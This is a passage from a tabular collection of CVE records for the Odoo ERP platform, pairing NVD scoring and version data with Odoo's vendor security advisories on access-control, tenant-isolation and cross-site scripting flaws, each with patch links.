**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
A malicious user might be able to craft a payment request to validate an online
purchase, charging the credit card of another user.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/08fe32272ed3208ab1c90d16b5531059b3a50cdd
- 14.0: https://github.com/odoo/odoo/commit/5ac55247b576312ea4f1f274c94d955dd23335d1
- 15.0: https://github.com/odoo/odoo/commit/9a063023f9f721f45af352d6275097718afee6ac
- 15.0-ent, 14.0-ent, 13.0-ent (Enterprise): see 15.0, 14.0 and 13.0.
| [SEC] CVE-2021-23178 - Improper access control in Odoo Community 15.... | https://api.github.com/repos/odoo/odoo/issues/107690/comments | 0 | 2022-12-10T23:00:37Z | 2022-12-10T23:00:38Z | https://github.com/odoo/odoo/issues/107690 | 1,489,087,135 | 107,690 |
CVE-2021-23186 | 2023-04-25T19:15:09.340 | A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to access and modify database contents of other tenants, in a multi-tenant system. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 5.8,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 5.8,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107688"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "2BFAF5BD-20F9-402C-B7EB-4E0294A572AE",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107688 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23186](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23186)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23186](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23186)
**Component**: Core
**Credits**: Nils Hamerlinck (Trobz)
A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise
15.0 and earlier allows authenticated administrators to access and modify
database contents of other tenants, in a multi-tenant system.
## I. Background
An Odoo system may host multiple databases on the same server, in a
multi-tenant fashion, while maintaining an isolation between each other.
## II. Problem Description
The framework contained a programming error that allowed to escape the
isolation of the database and access other databases hosted on the same
multi-tenant system.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Privileged user account required
**CVSS3 Score**: high :: 8.7
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)
A malicious administrator might be able to read or modify data of another
database hosted on the same server, by crafting malicious requests.
Systems who host Odoo databases for untrusted users are particularly at risk,
(e.g. SaaS platforms), as they typically allow users to become administrators
of their own Odoo database. This is sufficient to exploit the vulnerability.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/04e4e70bcb822d169cdee4fc702640b10a3a75ad
- 14.0: https://github.com/odoo/odoo/commit/c1d6d4a1d9148275213c7f3c286658366df03bd7
- 15.0: https://github.com/odoo/odoo/commit/af3b181af2773b4a8be534c9e3952790f0d959a6
- 15.0-ent, 14.0-ent, 13.0-ent (Enterprise): see 15.0, 14.0 and 13.0.
| [SEC] CVE-2021-23186 - A sandboxing issue in Odoo Community 15.0 and... | https://api.github.com/repos/odoo/odoo/issues/107688/comments | 0 | 2022-12-10T23:00:34Z | 2022-12-10T23:00:34Z | https://github.com/odoo/odoo/issues/107688 | 1,489,087,076 | 107,688 |
CVE-2021-23203 | 2023-04-25T19:15:09.403 | Improper access control in reporting engine of Odoo Community 14.0 through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote attackers to download PDF reports for arbitrary documents, via crafted requests. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107695"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:14.0:*:*:*:community:*:*:*",
"matchCriteriaId": "4D952E47-04E1-4146-A3AA-3804A1AB52DA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:14.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "BEB5354F-C1AC-48D6-8922-656F952442A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:15.0:*:*:*:community:*:*:*",
"matchCriteriaId": "EBD0BABD-16C5-449D-8BE7-9E948A509FA5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:15.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "24A23452-4857-4F4B-AA5A-944F9073A554",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107695 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23203](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23203)
**Affects**: Odoo 14.0 through 15.0 (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23203](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23203)
**Component**: Report engine
**Credits**: Tiffany Chang, iamsushi, Ranjit Pahan, Iago Ruiz
Improper access control in reporting engine of Odoo Community 14.0
through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote
attackers to download PDF reports for arbitrary documents, via crafted
requests.
## I. Background
Odoo includes a generic report engine that works on any business record,
based on report templates bundled in Odoo Apps. It uses the same Access
Control definitions as the rest of the system to determine who can open
a report and view its content.
## II. Problem Description
A programming error in the report engine did not properly apply the Access
Control settings, and allowed users to access reports on unauthorized
documents.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: User account not necessarily required
**CVSS3 Score**: High :: 7.5
**CVSS3 Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
This allows malicious users, including external users without a
user account, to access reports on arbitrary documents in an
affected database, as long as such a report exists.
This would not usually allow privilege escalation, but may
lead to unauthorized disclosure of sensitive information.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 14.0: https://github.com/odoo/odoo/commit/f2c1ee5a622db33a4411e7f9285f09387d1d7480
- 15.0: Same patch as for 14.0 applies for 15.0.
- 14.0-ent and 15.0-ent (Enterprise): see 14.0.
| [SEC] CVE-2021-23203 - Improper access control in reporting engine o... | https://api.github.com/repos/odoo/odoo/issues/107695/comments | 0 | 2022-12-10T23:00:46Z | 2022-12-10T23:00:48Z | https://github.com/odoo/odoo/issues/107695 | 1,489,087,315 | 107,695 |
CVE-2021-26263 | 2023-04-25T19:15:09.470 | Cross-site scripting (XSS) issue in Discuss app of Odoo Community 14.0 through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote attackers to inject arbitrary web script in the browser of a victim, by posting crafted contents. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107693"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:14.0:*:*:*:community:*:*:*",
"matchCriteriaId": "4D952E47-04E1-4146-A3AA-3804A1AB52DA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:14.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "BEB5354F-C1AC-48D6-8922-656F952442A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:15.0:*:*:*:community:*:*:*",
"matchCriteriaId": "EBD0BABD-16C5-449D-8BE7-9E948A509FA5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:15.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "24A23452-4857-4F4B-AA5A-944F9073A554",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107693 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-26263](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26263)
**Affects**: Odoo 14.0 and 15.0 (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-26263](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26263)
**Component**: Discuss
**Credits**: Theodoros Malachias, iamsushi, Ranjit Pahan
Cross-site scripting (XSS) issue in Discuss app of Odoo Community 14.0
through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote
attackers to inject arbitrary web script in the browser of a victim,
by posting crafted contents.
## I. Background
Odoo has a live chat feature to discuss in real time with employees or website
visitors. A notification is triggered when a new message is received.
## II. Problem Description
Improper input validation allowed to inject arbitrary code executed in the
browser of the viction when the message is received.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: None
**CVSS3 Score**: High :: 7.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
An attacker might craft requests to send arbitrary code to a victim and execute
web script without needing active interaction from the victim, other than being
connected. This may lead to privilege escalation and sensitive information
disclosure.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 14.0: https://github.com/odoo/odoo/commit/ff1db4a6aea522cf3dfc80ca88e64ffecfb5e07c
- 15.0: https://github.com/odoo/odoo/commit/41e7d26a751cf56f70afef314acae220bee464bc
- 15.0-ent, 14.0-ent (Enterprise): see 15.0 and 14.0.
| [SEC] CVE-2021-26263 - Cross-site scripting (XSS) issue in Discuss a... | https://api.github.com/repos/odoo/odoo/issues/107693/comments | 0 | 2022-12-10T23:00:43Z | 2022-12-10T23:00:44Z | https://github.com/odoo/odoo/issues/107693 | 1,489,087,216 | 107,693 |
CVE-2021-26947 | 2023-04-25T19:15:09.530 | Cross-site scripting (XSS) issue Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, via a crafted link. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107694"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "2BFAF5BD-20F9-402C-B7EB-4E0294A572AE",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107694 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-26947](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26947)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-26947](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26947)
**Component**: Core
**Credits**: Nils Hamerlinck (Trobz), Andreas Perhab (WT-IO-IT GmbH)
Cross-site scripting (XSS) issue Odoo Community 15.0 and earlier and
Odoo Enterprise 15.0 and earlier, allows remote attackers to inject
arbitrary web script in the browser of a victim, via a crafted link.
## I. Background
The Odoo framework is designed to be safe by default, and to ensure that all
user-controlled parameters are sanitized.
## II. Problem Description
Improper input validation on a generic template allowed to inject arbitrary code
executed when the victim clicks on a forged link.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: None
**CVSS3 Score**: Medium :: 6.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
An attacker might send a forged link to the victim in order to execute arbitrary
web script code in the victim's browser when they open the link.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/b08301e544263436e09762b0b252c96e732d14d0
- 14.0: https://github.com/odoo/odoo/commit/e451c4fbffa9472cd3686492e8ba41430ab3b235
- 15.0: https://github.com/odoo/odoo/commit/c3528f268dfb498a7806cb9b6f4aa3d964f421ea
- 15.0-ent, 14.0-ent, 13.0-ent (Enterprise): see 15.0, 14.0 and 13.0.
| [SEC] CVE-2021-26947 - Cross-site scripting (XSS) issue Odoo Communi... | https://api.github.com/repos/odoo/odoo/issues/107694/comments | 0 | 2022-12-10T23:00:44Z | 2022-12-10T23:00:45Z | https://github.com/odoo/odoo/issues/107694 | 1,489,087,256 | 107,694 |
CVE-2021-44460 | 2023-04-25T19:15:09.600 | Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier allows users with deactivated accounts to access the system with the deactivated account and any permission it still holds, via crafted RPC requests. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.2,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107685"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "97EB1578-CFCC-4301-AEE7-DBBC6A92BC25",
"versionEndExcluding": null,
"versionEndIncluding": "13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "3451E55A-C240-40BF-AA17-E11DC5A56002",
"versionEndExcluding": null,
"versionEndIncluding": "13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107685 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44460](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44460)
**Affects**: Odoo 13.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44460](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44460)
**Component**: Core
**Credits**: Xavier Morel
Improper access control in Odoo Community 13.0 and earlier and Odoo
Enterprise 13.0 and earlier allows users with deactivated accounts to
access the system with the deactivated account and any permission it
still holds, via crafted RPC requests.
## I. Background
Users can be deactivated as a way to keep the past information about them but
no longer allow them to login into an Odoo database. This is the typical
scenario when an employee leaves the company.
## II. Problem Description
Old users could still interact with the database through the API even though
they were no longer able to login through the login form.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Deactivated user account required
**CVSS3 Score**: High :: 7.4
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
A old employee or portal might abuse their past privileges to gain access to
recent information.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
Changing the password of deactivated users ensures an old user is no longer
able to craft RPC requests. Updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/8024a6e369b79abb1cbd52840fd66eaec66c07a3
- 13.0-ent (Enterprise): see 13.0.
| [SEC] CVE-2021-44460 - Improper access control in Odoo Community 13.... | https://api.github.com/repos/odoo/odoo/issues/107685/comments | 0 | 2022-12-10T23:00:28Z | 2022-12-10T23:00:29Z | https://github.com/odoo/odoo/issues/107685 | 1,489,086,977 | 107,685 |
CVE-2021-44461 | 2023-04-25T19:15:09.670 | Cross-site scripting (XSS) issue in Accounting app of Odoo Enterprise 13.0 through 15.0, allows remote attackers who are able to control the contents of accounting journal entries to inject arbitrary web script in the browser of a victim. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107686"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "D3FA7C86-7FC1-4310-9945-EE9265577C5D",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107686 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44461](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44461)
**Affects**: Odoo 13.0 to 15.0 (Enterprise Edition)
**CVE ID**: [CVE-2021-44461](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44461)
**Component**: Accounting (account_accountant)
Cross-site scripting (XSS) issue in Accounting app of Odoo Enterprise 13.0
through 15.0, allows remote attackers who are able to control the contents
of accounting journal entries to inject arbitrary web script in the browser
of a victim.
## I. Background
The Odoo accounting application allows external users to send invoices by email
that are automatically imported into an Odoo database.
## II. Problem Description
The content of the invoice was not properly sanitized.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: None
**CVSS3 Score**: Medium :: 6.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)
A malicious user could send a crafted invoice and trigger injected web script
code when an accountant opens the invoice.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
